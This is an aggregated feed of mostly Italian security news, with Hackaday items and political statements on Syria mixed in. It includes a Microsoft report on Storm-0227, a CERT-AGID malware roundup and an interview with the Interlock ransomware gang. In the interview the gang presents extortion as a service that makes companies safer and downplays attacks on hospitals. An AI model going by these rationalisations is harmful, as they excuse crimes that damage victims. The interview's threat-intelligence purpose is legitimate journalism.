Salta al contenuto principale



Microsoft lancia l’allarme: Storm-0227 contro infrastrutture critiche USA


Microsoft riferisce che il 5 dicembre il gruppo di hacker cinese Storm-0227 ha iniziato ad attaccare infrastrutture critiche e agenzie governative statunitensi. Gli hacker sono attivi da gennaio e rimangono attivi fino ad oggi.

Le attività di Storm-0227 si sovrappongono a quelle di altri gruppi di spionaggio cinesi come Silk Typhoon (Hafnium) e TAG-100. Negli ultimi 12 mesi, le organizzazioni statunitensi sono diventate obiettivi importanti, tra cui le industrie della difesa, le compagnie aeree, le società di telecomunicazioni, i settori finanziario e legale, nonché le agenzie governative e le organizzazioni no-profit.

Storm-0227 sfrutta le vulnerabilità note delle applicazioni Web e le e-mail di phishing con allegati o collegamenti dannosi. Da settembre, gli aggressori distribuiscono attivamente SparkRAT, uno strumento di amministrazione remota open sourceche consente l’accesso permanente ai sistemi delle vittime. È interessante notare che il gruppo non sviluppa malware propri, ma utilizza soluzioni disponibili sul mercato.

A seguito della violazione, i criminali informatici rubano le credenziali per i servizi cloud, tra cui Microsoft 365 ed eDiscovery. Lavorare con applicazioni legittime consente di nasconderti dal rilevamento mascherandoti da utenti normali. L’obiettivo principale degli attacchi è ottenere informazioni riservate, comprese e-mail e file associati. Gli analisti affermano che tali dati aiutano gli hacker a comprendere meglio le operazioni delle vittime.

Le vittime di Storm-0227 si sovrappongono a settori che sono stati attaccati da altri gruppi di hacker cinesi, Salt Typhoon (specializzato in telecomunicazioni) e Volt Typhoon. Gli esperti avvertono che l’attività del gruppo continuerà mentre la Cina si concentra sulla raccolta di informazioni di interesse per la sicurezza nazionale.

Microsoft sottolinea che le spie informatiche continuano a estrarre file per scopi di intelligence, compresi i dati contestuali dalle comunicazioni. L’attenzione principale rimane sugli interessi americani e sulle risorse strategiche.

L'articolo Microsoft lancia l’allarme: Storm-0227 contro infrastrutture critiche USA proviene da il blog della sicurezza informatica.



RHC DarkLab Intervista Interlock Ransomware. “Non sprecare energie e tempo. Lo faremo noi per te!”


RHC DarkLab ha sempre adottato un approccio unico e provocatorio nella lotta contro le minacce cyber, sintetizzato dal motto: “Occorre conoscere i Demoni per imparare a contrastarli.” Questa filosofia guida il nostro impegno costante nel comprendere i Threat Actors attraverso interviste dirette, per esporre le loro tecniche, tattiche e procedure (TTPs) e migliorare le difese di chi si trova a fronteggiare questi avversari insidiosi.

Le cyber gang, come Interlock, si presentano spesso con un mix di motivazioni e abilità altamente sofisticate, come dimostrato dai recenti attacchi che hanno preso di mira sistemi apparentemente sicuri come FreeBSD. In molti casi, dichiarano di agire per colmare le lacune lasciate dalle organizzazioni bersaglio, come se fosse una sorta di giustizia cyber, ma dietro queste dichiarazioni si nascondono moventi puramente finanziari o ideologici. Questi attacchi non solo minacciano la stabilità delle infrastrutture digitali, ma sottolineano il crescente bisogno di una comprensione più profonda delle strategie adottate dai criminali informatici.
27644139Home Page del Data leak Site (DLS) di Interlock Ransomware
Le nostre interviste con i Threat Actors, come Vanir Group o Ransomcortex, mostrano la diversità di approcci e motivazioni che alimentano le operazioni di ransomware. Dalla semplice avidità alle complesse reti di collaborazioni, ogni gruppo opera con regole e obiettivi specifici, spesso dettati da opportunità economiche o da considerazioni geopolitiche. Questo dialogo, sebbene controverso, permette di rivelare dettagli critici sul funzionamento interno delle organizzazioni criminali, offrendo agli esperti di sicurezza un vantaggio nella loro lotta contro queste minacce.

Nel caso di Interlock, le dichiarazioni come “Se non prendete sul serio la sicurezza, lo faremo noi per voi” enfatizzano un atteggiamento provocatorio e un intento di mettere in luce la vulnerabilità delle aziende. È fondamentale analizzare queste affermazioni non solo per capire le loro tattiche, ma anche per anticipare e prevenire future campagne di attacco. Attraverso queste interviste, RHC DarkLab offre una finestra su un mondo oscuro e complesso, unendo rigore investigativo e una profonda conoscenza tecnica. Questo ci consente di costruire una narrativa solida e utile, che informa non solo i professionisti della sicurezza, ma anche il pubblico più ampio, aumentando la consapevolezza collettiva.

Di seguito, presentiamo l’intervista esclusiva con la cyber gang Interlock, un ulteriore tassello nel nostro impegno per svelare i segreti dei “Demoni digitali” e contrastarne l’impatto devastante.
27644141Sezione “About Us” presente all’interno del Data leak Site (DLS) di Interlock
1 – RHC: Grazie ragazzi per aver accettato questa intervista. Siete un gruppo che è apparso di recente nell’underground, potete raccontarci come e quando è nato il gruppo Interlock e perché la scelta di questo nome? Inoltre, congratulazioni per il sito, è davvero bello!
Interlock: Interlocker è stato creato nel 2024. Il nome deriva da “International Locker”.

2 – RHC: Nel vostro manifesto affermate di voler “imporre responsabilità” alle aziende negligenti. Cosa vi ha spinto a scegliere questo approccio e quali valori vi guidano come collettivo?
Interlock: Ogni virus è un passo verso l’evoluzione. Le nostre attività spingono il settore della sicurezza informatica a evolversi e migliorare le tecnologie.

3 – RHC: Sostenete di essere un “campanello d’allarme” per la negligenza aziendale. In che misura pensate che le aziende siano realmente consapevoli del rischio di attacchi ransomware e perché pensate che molte continuino a ignorarlo?
Interlock: Le aziende che ignorano i potenziali attacchi sottovalutano gravemente i rischi nella loro ricerca del massimo profitto. Raccolgono NPI (Informazioni non pubbliche), le analizzano in modo efficace e bombardano gli utenti con annunci mirati per aumentare i ricavi. Eppure dimenticano la loro responsabilità per i dati che raccolgono. Siamo qui per ricordare loro questa responsabilità.

4 – RHC: Molte cybergang affermano di agire per amore della giustizia, ma la percezione pubblica è spesso diversa. Come vorresti che fossero interpretate le vostre azioni? E come rispondete a coloro che vi considerano semplicemente dei criminali?
Interlock: L’opinione pubblica si basa spesso su idee sbagliate. Molte aziende sfruttano la mancanza di comprensione del pubblico e lo ingannano intenzionalmente. Affermano di raccogliere informazioni anonime, ma in realtà utilizzano grandi set di dati per creare profili dettagliati, formando bolle pubblicitarie per manipolarti e farti credere che desideri i loro prodotti. Questa tecnologia è troppo complessa perché il cittadino medio possa comprenderla.

5 – RHC: Siete entrati di recente nel mondo del cybercrime. Quali sono i vostri obiettivi e la vostra propensione? Divenire un prezioso RaaS o operare in proprio? Avete attualmente un programma di affiliazione? Come sta andando l’attività?
Interlock: Il nostro obiettivo è rendere il mondo un po’ più sicuro di prima.

6 – RHC: Al netto delle aziende presenti sul vostro Data leak Site (DLS), che attualmente sono 6, quante aziende avete hackerato in totale e quanto è il riscatto medio che siete riusciti ad estorcere?
Interlock: Puoi tracciare tutte le aziende sul nostro sito. Le aziende non elencate hanno ricevuto una lezione preziosa, hanno corretto i loro errori e meritano rispetto per le loro azioni.

7 – RHC: Ora parliamo della vostra soluzione. In che modo il vostro ransomware si differenzia da altri ransomware come il famoso LockBit 3.0 o Akira? Se dovessi spiegare a un potenziale affiliato perché iniziare una partnership con te, cosa diresti da un punto di vista tecnico riguardo alla tua soluzione?
Interlock: Non spieghiamo i vantaggi del nostro programma ai potenziali partner. Innanzitutto, verifichiamo che i nostri partner siano black hat competenti con esperienza sufficiente per valutare il nostro software. Non accettiamo principianti.

8 – RHC: Siete tra i pochi gruppi ad aver sviluppato un ransomware per FreeBSD, una piattaforma robusta utilizzata in ambienti complessi come i data center (WhatsApp, Playstation, pfSense) e le infrastrutture critiche. Come siete arrivati ​​a scegliere FreeBSD come vostro obiettivo e quali sfide tecniche avete dovuto affrontare nello sviluppo di un ransomware per questo sistema?
Interlock: Non ci sono state difficoltà con FreeBSD. Avevamo un obiettivo e lo abbiamo raggiunto.

9 – RHC: Quali vulnerabilità o errori di configurazione riscontrate più frequentemente nei vostri obiettivi? Ci sono delle tendenze comuni che avete osservato nelle infrastrutture aziendali compromesse?
Interlock: La tendenza principale è il fattore umano. Vediamo la frustrazione consumare gli amministratori di rete al lavoro, fanno tutto tranne il loro lavoro. Pornografia, shopping online senza fine, servizi di intrattenimento e social media dominano il loro tempo.

11 – RHC: Come valutate l’efficacia delle attuali difese di sicurezza informatica adottate dalle aziende? Esistono soluzioni o pratiche che, secondo voi, renderebbero i sistemi più sicuri contro attacchi come il vostro?
Interlock: Le misure di sicurezza stanno migliorando, il che è entusiasmante, è una nuova sfida per noi. Sebbene esistano metodi per complicare gli attacchi, le reti completamente sicure sono un’utopia. I rischi possono essere ridotti, ma non eliminati del tutto.

12 – RHC: Se dovessi dare un consiglio a un’azienda che non ha ancora un programma di sicurezza informatica in atto, quale sarebbe la prima cosa da fare?
Interlock: pensa attentamente, poi fai una scelta, non il contrario.

13 – RHC: Nel secondo trimestre del 2024, gli attacchi ransomware sono cresciuti in modo significativo, lo segnalate anche sul vostro sito. Cosa pensate di questa tendenza? Pensate che potremmo raggiungere un punto di saturazione o di “equilibrio”, in cui le aziende adotteranno difese che renderanno attacchi come il vostro meno efficaci?
Interlock: Apsis arriverà sempre, e poi inizierà un nuovo gioco con nuove regole e nuovi giocatori.

14 – RHC: Il vostro manifesto ci ha stupiti per la comunicazione. Parla di “lezioni che le aziende non dimenticheranno”. Avete mai osservato aziende o individui imparare effettivamente lezioni dai vostri attacchi? Come vi sentiresti se le aziende migliorassero drasticamente le loro difese?
Interlock: Quasi tutte le aziende rafforzano le loro difese dopo averci incontrato. Tuttavia, alcune non riescono a imparare la lezione e continuano a usare metodi obsoleti. Questo non dura a lungo.

15 – RHC: Molti ransomware hanno colpito anche istituzioni pubbliche, ospedali e settori critici, causando danni a persone innocenti. Come scegliete le vostre vittime e cosa dire dei danni collaterali che possono colpire persone esterne all’azienda? Avete policy interne che proibiscono obiettivi specifici?
Interlock: Paradossalmente, sistemi critici come istituzioni pubbliche e ospedali hanno spesso una protezione minima. Questa mancanza di investimenti in sicurezza evidenzia la necessità di dare priorità alla loro difesa.

16 – RHC: L’intelligenza artificiale è sempre più integrata nella sicurezza informatica. Cosa pensate dei tentativi di usare l’intelligenza artificiale per anticipare, prevenire e mitigare attacchi come il vostro? Ci sono contromisure particolari che intendete adottare in risposta a questa tecnologia?
Interlock: L’intelligenza artificiale cambia il campo di gioco. Ci divertiamo con questo gioco e ci evolviamo per contrastarlo.

17 – RHC: Siete d’accordo con l’affermazione “se usi un computer ma non ti sforzi di proteggerlo (e quindi non conosci lo strumento), non meriti di usarlo”?
Interlock: Dimentica le restrizioni che tutti dovrebbero avere quando usano i computer. Gli errori capitano a tutti.

18 – RHC: Sul vostro DLS si evince una certa sensibilità nell’area della sicurezza informatica. Sebbene le vostre azioni possano essere giudicate solo in base alle statistiche sulla criminalità, cosa vi ha realmente motivato a entrare in quest’area escludendo il denaro?
Interlock: denaro + informazioni, cosa potrebbe essere meglio?

19 – RHC: Vi siete mai offerti a spiegare a una vittima i difetti che avete sfruttato e come risolverli per evitare attacchi futuri?
Interlock: No, non l’abbiamo fatto.

20 – RHC: Qual è secondo voi la vera motivazione per cui lo stato dell’arte nel mondo della sicurezza informatica è scarso nonostante gli investimenti (sia finanziari che di altro tipo) nel settore? Pensate che ci sia solo molta apparenza e poca sostanza?
Interlock: La sicurezza informatica rimane scarsa perché gli sforzi si concentrano su misure reattive, strumenti appariscenti e di conformità invece di affrontare questioni fondamentali come talento, implementazione e basi di sicurezza.

22 – RHC: Qual è la configurazione errata/vulnerabilità più stupida che avete trovato sulle reti delle vittime?
Interlock: l’amministratore di dominio di un’azienda globale ha utilizzato un singolo spazio come password.

23 – RHC: Cosa diresti a qualcuno che ti dicesse che dovresti contribuire a rendere sicure le reti invece di abusarne solo per motivi economici?
Interlock: “Stiamo già contribuendo a renderle più sicure. Dagli tempo e te ne accorgerai tu stesso.”

24 – RHC: Qual è il primo suggerimento che daresti a qualcuno che vuole iniziare a mettere su ub nuovo RaaS? In base alla vostra esperienza, quali sono stati gli aspetti più difficili e quelli più facili?
Interlock: Valuta i rischi e se sei pronto ad accettarli, ti auguriamo buona fortuna. L’impossibile è possibile.

25 – RHC: Ultimamente, le intelligence e le agenzie governative hanno condotto diverse campagne per distruggere le risorse digitali delle operazioni di criminalità informatica. Quali sono le vostre considerazioni a riguardo? Vi preoccupa?
Interlock: Sì, siamo preoccupati quando i poliziotti sono alle nostre spalle, ma non gli voltiamo mai le spalle.

26 – RHC: Infine, se poteste inviare un messaggio alle aziende che considerate “negligenti” e che sottovalutano il valore dei dati, quale sarebbe il tuo consiglio? Cosa dovrebbero cambiare oggi per evitare di essere bersagli futuri?
Interlock: Non sprecare energie e tempo. Lo faremo noi per te. 😉

27 – RHC: Grazie mille ragazzi per l’intervista. Facciamo queste interviste per far capire ai nostri lettori che la sicurezza informatica è un argomento puramente tecnico e che per poter vincere la lotta contro la criminalità informatica dobbiamo essere più forti di voi, che siete noti per essere spesso un passo avanti a tutti. C’è qualcosa che vorreste dire ai nostri lettori o alle potenziali vittime delle vostre operazioni?
Interlock: La sicurezza informatica è uno sforzo di squadra. Mentre i Black Hat sono spesso un passo avanti, restare vigili, usare password complesse e mantenere il software aggiornato può fare un’enorme differenza.

L'articolo RHC DarkLab Intervista Interlock Ransomware. “Non sprecare energie e tempo. Lo faremo noi per te!” proviene da il blog della sicurezza informatica.



Magic Eye Images In Your Spreadsheet


27640785

Ah, the 1990s. It was a simpler time, when the web was going to be democratic and decentralised, you could connect your Windows 95 PC to the internet without worrying much about it being compromised, and freely download those rave music MP3s. Perhaps you had a Global Hypercolor T-shirt and spent a summer looking like the sweaty idiot you were, and it’s certain you desperately squinted at a magic eye image in a newspaper (remember newspapers?) trying to see the elephant or whatever it was. If you’d like to relive that experience, then [Dave Richeson] has a magic eye image generator for Microsoft Excel.

Unfortunately a proportion of the population including your scribe lack the ability to see these images, a seemingly noise-like pattern of dots on the page computationally generated to fool the visual processing portion of your brain to generate a 3D image. The Excel sheet allows you to create the images, but perhaps most interesting is the explanation of the phenomenon and mathematics which go along with it. Along with a set of test images depicting mathematical subjects, it’s definitely worth a look.

You can download a template and follow the instructions, and from very limited testing here we can see that LibreOffice doesn’t turn its nose up at it, either. Give it a go, and learn afresh the annoyance of trying to unfocus your eyes.


hackaday.com/2024/12/08/magic-…



FormBook, Rhadamanthys e AgentTesla i Malware Più Diffusi in Italia


In questa settimana, il CERT-AGID ha riscontrato ed analizzato, nello scenario italiano di suo riferimento un totale di 37 campagne malevole, di cui 20 con obiettivi italiani e 17 generiche che hanno comunque interessato l’Italia, mettendo a disposizione dei suoi enti accreditati i relativi 622 indicatori di compromissione (IoC) individuati.

Riportiamo a seguire il dettaglio delle tipologie illustrate nei grafici, risultanti dai dati estratti dalle piattaforme del CERT-AGID e consultabili tramite la pagina delle Statistiche.

Andamento della settimana


Sono 16 i temi sfruttati questa settimana per veicolare le campagne malevole sul territorio italiano. In particolare si rileva:

  1. Fattura – Argomento utilizzato per veicolare tramite campagne generiche i malware AgentTesla, Formbook e Rhadamanthys, oltre a essere stato utilizzato per due campagne di phishing italiane a tema Aruba, veicolate tramite PEC compromesse, e una campagna di phishing DocuSign generica.
  2. Legale – Tema servito per veicolare numerosi malware, tra cui PureLogs Stealer, AsyncRAT, RedLine, Rhadamanthys e XMrig, tutti tramite campagne italiane.
  3. Ordine – Argomento utilizzato per una campagna di phishing generica a tema Webmail, oltre ad essere servito per veicolare i malware Rhadamanthys tramite Guloader e SnakeKeylogger.
  4. Pagamenti – Tema sfruttato per una campagna generica di phishing ai danni di utenti di Office365 oltre che per due campagne generiche finalizzate alla distribuzione dei malware AgentTesla e Formbook.
  5. Banking – Argomento ricorrente questa settimana, sfruttato per tre campagne veicolate tramite PEC e rivolte a clienti di Intesa Sanpaolo.

Il resto dei temi sono stati utilizzati per veicolare campagne di malware e di phishing di vario tipo.

Eventi di particolare interesse


  • Si è riscontrato un incremento nell’utilizzo delle caselle PEC compromesse o fraudolente per la diffusione di campagne di phishing a tema bancario. Particolarmente attive risultano le campagne ai danni di utenti Intesa SanPaolo. Gli attaccanti sfruttano la fiducia riposta nella posta certificata per veicolare link a finte repliche della pagina dell’home banking con lo scopo di sottrarre credenziali di accesso e dati di carte di pagamento. Nuovi Indicatori di Compromissione (IoC) sono stati resi disponibili nella news del CERT-AGID.
  • La scorsa settimana il CERT-AGID ha rilevato un malware AgentTesla con meccanismo di attivazione difettoso. L’eseguibile, veicolato come allegato email, nonostante presentasse caratteristiche da file malevolo, non generava alcun traffico di rete e in prima battuta non è stato possibile determinare la sua precisa natura. Il comportamento insolito è stato corretto nei giorni successivi con una nuova versione del malware diffusa con una nuova campagna. Un’analisi al riguardo è stata pubblicata sul sito del CERT-AGID.


Malware della settimana


Sono state individuate, nell’arco della settimana, 11 famiglie di malware che hanno interessato l’Italia. Nello specifico, di particolare rilievo, troviamo le seguenti campagne:

  1. FormBook – Rilevate una campagna italiana a tema “Delivery” e due campagne generiche a tema “Pagamenti” e “Fattura”, veicolate tramite email con allegati ZIP e RAR.
  2. Rhadamanthys via GuLoader – Individuate una campagna italiana a tema “Legale” e due campagne generiche a tema “Ordine” e “Fattura”, diffuse tramite email con allegati XLSX e PDF o link a file malevoli.
  3. AgentTesla – Rilevate due campagne generica a tema “Pagamenti” e “Fattura”, diffuse mediante email con allegati ZIP.
  4. XMRig – Scoperta una campagna italiana a tema “Legale”, diffusa mediante email con allegato ZIP.
  5. PureLogs – Individuata una campagna italiana a tema “Legale”, veicolata tramite email con allegato BAT.
  6. Redline – Rilevata una campagna italiana a tema “Legale”, veicolata tramite email con allegato contenete file EXE.
  7. AsyncRAT – Individuata una campagna italiana a tema “Legale”, veicolata tramite email con allegato compresso contenete EXE.
  8. Remcos via GuLoader – Individuata una campagna italiana veicolata tramite email con allegato 7Z.
  9. KoiStelaer – Scoperta una campagna italiana veicolata tramite email con allegato ZIP.
  10. SnakeKeylogger – Individuata una campagna italiana a tema “Ordine”, diffusa tramite email con allegato Z.
  11. SpyNote – Individuata una campagna generica che sfrutta il tema “Aggiornamenti” e veicola l’APK malevolo tramite SMS.

L'articolo FormBook, Rhadamanthys e AgentTesla i Malware Più Diffusi in Italia proviene da il blog della sicurezza informatica.



In occasione della caduta del regime tirannico del Baath in Siria.
Ai popoli liberi della Siria: curdi, arabi, siriaci, assiri, musulmani, cristiani e yazidi.

Oggi voltiamo una pagina nera della storia moderna della Siria con la caduta del regime tirannico del Baath che ha governato il Paese con la repressione e il pugno di ferro per decenni.

Il nostro popolo ha sofferto per l’emarginazione, l’oppressione e la divisione attuate dal regime per distruggere il tessuto sociale e consolidare il proprio potere. Ma la volontà del popolo è più forte di qualsiasi regime tirannico, e qui stiamo contemplando una svolta storica verso la libertà e la dignità.

In questo momento critico chiediamo a tutte le componenti della Siria settentrionale e orientale di proteggere i risultati dell’amministrazione autonoma e di stringersi attorno alle Forze Democratiche Siriane (SDF) come garanti della sicurezza e della stabilità nelle aree liberate.

L’SDF ha dimostrato di essere una forza di unificazione nazionale che ha lavorato per proteggere la popolazione in tutte le sue componenti e crede nel pluralismo e nella democrazia come base per costruire il futuro della Siria.
Noi, partiti e forze che firmano questa dichiarazione, mentre ci congratuliamo con il nostro popolo per la caduta del regime di oppressione e tirannia, affermiamo che spetta a noi aprire una nuova fase per:

  1. Garantire la sicurezza e la stabilità attraverso la cooperazione con le forze nazionali sul terreno, impedendo qualsiasi tentativo di seminare il caos o di tornare indietro.
  2. Promuovere un dialogo nazionale tra tutte le componenti del popolo siriano senza discriminazioni o esclusioni per creare le basi di una nuova Siria.
  3. Costruire una Siria pluralista, democratica e decentrata, dove ogni componente abbia il diritto di gestire i propri affari, dove i diritti umani siano rispettati e dove giustizia ed equità siano preservate per tutti.

Invitiamo inoltre il nostro popolo a essere vigile e responsabile, poiché la nuova fase è piena di sfide, ma anche di speranze, per costruire una patria democratica in cui prevalgano pace e giustizia.
Lavoriamo per una Siria democratica, pluralista e decentrata.
Gloria ai martiri della libertà.

Partiti e forze che firmano la dichiarazione:

- Congresso Nazionale del Kurdistan (KNK)

  1. Partito dell’Unione Democratica.
  2. Partito Verde Democratico.
  3. Partito della Pace e della Democrazia del Kurdistan.
  4. Partito Liberale del Kurdistan.
  5. Partito Comunista del Kurdistan.
  6. Partito Democratico del Kurdistan -Siria.
  7. Partito Democratico Curdo Siriano.
  8. Partito della Sinistra Curda in Siria.
  9. Partito della Sinistra Democratica Curda in Siria.
  10. Partito del futuro siriano.
  11. Partito del cambiamento democratico del Kurdistan.
  12. Partito del Rinnovamento del Kurdistan.
  13. Unione dei lavoratori del Kurdistan.


Silicon Carbide May Replace Zirconium Alloys for Nuclear Fuel Rod Cladding


27631680

Since the construction of the first commercial light water nuclear power plants (LWR) the design of their fuel rods hasn’t changed significantly. Mechanically robust and corrosion-resistant zirconium alloy (zircalloy) tubes are filled with ceramic fuel pellets, which get assembled into fuel assemblies for loading into the reactor.
A 12' SiGa fuel assembly, demonstrating the ability to scale to full-sized fuel rods. (Credit: DoE)A 12′ SiGa fuel assembly, demonstrating the ability to scale to full-sized fuel rods. (Credit: DoE)
Now it seems that silicon carbide (SiC) may soon replace the traditional zirconium alloy with General Atomics’ SiGa fuel cladding, which has been tested over the past 120 days in the Advanced Test Reactor at Idaho National Laboratory (INL). This completes the first of a series of tests before SiGa is approved for commercial use.

One of the main advantages of SiC over zircalloy is better resistance to high temperatures — during testing with temperatures well above those experienced with normal operating conditions, the zircalloy rods would burst while the SiC ones remained intact (as in the embedded video). Although normally SiC is quite brittle and unsuitable for such structures, SiGa uses SiC fibers, which allows it to be used in this structural fashion.

Although this development is primarily part of the Department of Energy’s Accident Tolerant Fuel Program and its focus on melt-down proof fuel, the switch to SiC could also solve a major issue with zirconium, being its use as a catalyst with hydrogen formation when exposed to steam. Although with e.g. Fukushima Daiichi’s triple meltdown the zircalloy fuel rods were partially destroyed, it was the formation of hydrogen gas inside the reactor vessels and the hydrogen explosions during venting which worsened what should have been a simple meltdown into something significantly worse.

youtube.com/embed/x7DvtG3tlhE?…


hackaday.com/2024/12/08/silico…



Hackaday Links: December 8, 2024


Hackaday Links Column Banner

For some reason, we never tire of stories highlighting critical infrastructure that’s running outdated software, and all the better if it’s running on outdated hardware. So when we learned that part of the San Francisco transit system still runs on 5-1/4″ floppies, we sat up and took notice. The article is a bit stingy with the technical details, but the gist is that the Automatic Train Control System was installed in the Market Street subway station in 1998 and uses three floppy drives to load DOS and the associated custom software. If memory serves, MS-DOS as a standalone OS was pretty much done by about 1995 — Windows 95, right? — so the system was either obsolete before it was even installed, or the 1998 instance was an upgrade of an earlier system. Either way, the San Francisco Municipal Transportation Agency (SFMTA) says that the 1998 system due to be replaced originally had a 25-year lifespan, so they’re more or less on schedule. Replacement won’t be cheap, though; Hitachi Rail, the same outfit that builds systems that control things like the bullet train in Japan, is doing the job for the low, low price of $212 million.

We don’t know who needs to here this, but we got a tip from Clem Mayer about upcoming changes to EU regulations that might affect the maker community. It concerns the General Product Safety Regulations, or GPSR, which appears to be an extension of current rules that will impose additional compliance burdens on anyone selling products to the EU market on online marketplaces. We won’t pretend to know the intricacies of GPSR, or even the basics, but Smander.com has a brief summary of the rules and how best to comply, which seems to amount to retaining the services of a company to take care of the compliance paperwork. We also took a look at the official EU information page for GPSR, which is pretty thin on information but at least it’s a primary source. If you’re selling kits or other products into the EU market, chances are good that you’re going to need to figure this out, and soon — seems like the rules go into effect December 13th.

You’ve got to feel for the authors of open-source software. As if developing, maintaining, and supporting the software that keeps the Internet running wasn’t a thankless enough job, you can actually get doxxed by your own creation. A case in point is Daniel Stenberg, the original author and lead developer on curl and libcurl. His name and email address are often found in the documentation for products using his software, so frustrated users who find his contact information tend to reach out to him after being ignored by the product’s support team. It seems annoying, and we sympathize with Daniel and others like him, but then again, it’s a measure of your impact that your contact information is literally everywhere.

If you’re in the market for a unique gift for the geek in your life and have an extra $230 to spread around, check out this custom Lego kit of the ASML TWINSCAN EXE:500 extreme UV lithography machine. Actually, strike that; now that we look at the specs, this kit is tiny. It’s only 851 pieces and 13.9″ (35 cm) wide when assembled, and isn’t exactly a richly detailed piece. Sure, Lego kits are fun, but there seem to be much better choices out there; we had a blast putting together the Apollo 11 Lunar Module Eagle kit a few years back, and that was only about $70.

And finally, Festo fans will want to check out this literal air guitar from the automation company’s “Experience Center” in Lupfig, Switzerland. Festo engineers bedazzled an acoustic guitar with pneumatic cylinders and control valves and programmed the system to pluck out the intro riff from AC/DC’s “Thunderstruck.” It’s actually pretty good, and we especially appreciate the pneumatic party whistle that chips in from time to time. There’s a missed opportunity here, though; we really expected a pneumatic cylinder to do the characteristic double rap on the body of the guitar when you get to the “Thun-der!” part. Too bad — maybe for version two.

youtube.com/embed/Oatc1QpXyQc?…


hackaday.com/2024/12/08/hackad…



La scoperta di una vulnerabilità negli ATM: basta un gesto per svelare i segreti


@Informatica (Italy e non Italy 😁)
Gli sportelli automatici (ATM), pilastri del nostro sistema bancario, sono generalmente percepiti come dispositivi sicuri. Tuttavia, come ci dimostra la ricerca condotta da Enes_0425, un ricercatore di sicurezza informatica, queste macchine possono



La rete antimafia @ON si riunisce a Roma


Immagine/foto

Recentemente a Roma, presso il Centro Operativo DIA, si è tenuto un meeting della Rete @ON (Antimafia Operational Network) con i rappresentanti delle Forze di Polizia di Belgio, Germania, Francia, Paesi Bassi, Spagna ed EUROPOL che unitamente, all’Italia rappresentano il Core Group del Network.

La DIA (Direzione Investigativa Antimafia) sostiene con impegno l’azione di contrasto internazionale alle mafie, anche attraverso una mirata attività di cooperazione di Polizia per il contrasto del fenomeno transnazionale delle più pericolose organizzazioni criminali.

Il recente evento romano riveste un particolare valore simbolico in quanto ricaduto a 10 anni esatti dall’istituzione della Rete @ON, con la risoluzione del 4 dicembre 2014 del Consiglio dell’Unione Europea, promossa dalla DIA, quale risultato del Dipartimento della Pubblica Sicurezza nel corso del Semestre di Presidenza italiana di turno.

Immagine/foto

Lo scopo della Rete @ON è quello di rafforzare la cooperazione delle Forze di Polizia contro i principali gruppi della criminalità organizzata, anche di tipo mafioso, che hanno un impatto sulla sicurezza dei cittadini europei.

I gruppi criminali sottoposti ad attenzione sono italiani, di etnia albanese, euroasiatici, bande di motociclisti, ma anche quelli emergenti (Moccro Maffie, nigeriane ed altre) che pongono un serio rischio per la sicurezza e l’economia dell’UE.

La DIA ha promosso, ottenuto e gestito – quale leader dell’iniziativa – progressivi finanziamenti della Commissione UE per sostenere le attività operative delle 51 Agenzia di Polizia che aderiscono al Network in rappresentanza di 44 Paesi.

Ad oggi il Network sta supportando le Unità investigative partner in 216 investigazioni e ha finanziato 617 missioni in favore di oltre 2.500 investigatori che hanno portato all’arresto di 1.068 persone, inclusi 15 latitanti oltre al sequestro di circa 271 milioni di euro, droga, veicoli, beni di lusso ed armi.



Pedaling your Mobile Web Server Across the Globe


Front view of blue bicycle with Raspberry Pi webserver

We tinkerers often have ideas we know are crazy, and we make them up in the most bizarre places, too. For example, just imagine hosting a website while pedaling across the world—who would (not) want that? Meet [Jelle Reith], a tinkerer on an epic cycling adventure, whose bicycle doubles as a mobile web server. [Jelle]’s project, jelle.bike, will from the 6th of December on showcase what he’s seeing in real time, powered by ingenuity and his hub dynamo. If you read this far, you’ll probably guess: this hack is done by a Dutchman. You couldn’t be more right.

At the heart of [Jelle]’s setup is a Raspberry Pi 4 in a watertight enclosure. The tiny powerhouse runs off energy generated by a Forumslader V3, a clever AC-to-DC converter optimized for bike dynamos. The Pi gets internet access via [Jelle]’s phone hotspot, but hosting a site over cellular networks isn’t as simple as it sounds. With no static IP available, [Jelle] routes web traffic through a VPS using an SSH tunnel. This crafty solution—expanded upon by Jeff Geerling—ensures seamless access to the site, even overcoming IPv6 quirks.

The system’s efficiency and modularity exemplify maker spirit: harnessing everyday tools to achieve the extraordinary. For more details, including a parts list and schematics, check out [Jelle]’s Hackaday.io project page.


hackaday.com/2024/12/08/pedali…



La fine del cinquantennale regime degli Assad segna una vittoria per la Turchia, gli USA, Israele e le petromonarchie che hanno sostenuto per tredici anni la guerra per procura delle forze jihadiste. Il piano statunitense di disgregazione dei grandi stati che erano stati protagonisti molti decenni fa del nazionalismo panarabista dopo Iraq e Libia ha avuto come bersaglio la Siria. Il regime, indebolito dalla guerra civile, dalle sanzioni e dall’occupazione americana dei suoi siti petroliferi, non ha retto ulteriormente senza il supporto di Hezbollah e Iran duramente colpiti da Israele. Non è chiaro cosa sia successo in questi giorni e il ruolo svolto dalla Russia e da altre potenze. La condanna della repressione che ha caratterizzato il regime laico degli Assad certo non giustifica lo sdoganamento come liberatori degli jihadisti di Al Quaeda come Jolani e il suo HTS o degli islamisti dello SNA che con l’esercito turco attaccano il Rojava curdo, l’unica realtà di autogoverno democratico e convivenza della regione. Il presunto liberatore di Damasco ha già definito il PKK di Ocalan organizzazione terrorista. Come al solito i media occidentali sdoganano come “ribelli” i fondamentalisti islamici quando sono al loro servizio. In questo contesto l’Italia e l’Unione Europea, dovrebbero operare per garantire il rispetto dei diritti umani dell’intera popolazione siriana, vera vittima di questa guerra eterna e del diritto internazionale, la salvaguardia dell’integrità territoriale della Siria, la protezione delle minoranze e del Rojava dall’aggressione islamista e turca. una transizione democratica attraverso una conferenza di pace con tutte le forze in campo sotto l’egida del segretario generale ONU e la costruzione delle condizioni per la convivenza di tutte le comunità con il metodo del confederalismo democratico, la determinazione della natura dello stato (confederale o federale) e delle istituzioni per arrivare a libere elezioni sotto supervisione dell’ONU. Va negato qualsiasi riconoscimento internazionale a formazioni terroristiche islamiste che intendano imporre sharia e persecuzione delle donne. Su questi obiettivi proponiamo di mobilitarci unitariamente in Italia e in Europa alle forze politiche e sociali di sinistra e antifasciste e ai movimenti pacifisti, antimperialisti e femministi. Al popolo siriano, in tutte le sue componenti, vanno garantiti pace, libertà e diritti, così come alle altre popolazioni martoriate del Medio Oriente.

Maurizio Acerbo, segretario nazionale del Partito della Rifondazione Comunista – Sinistra Europea



New Tullomer Filament Claims to Beat PEEK, Aluminium and Steel


27597243

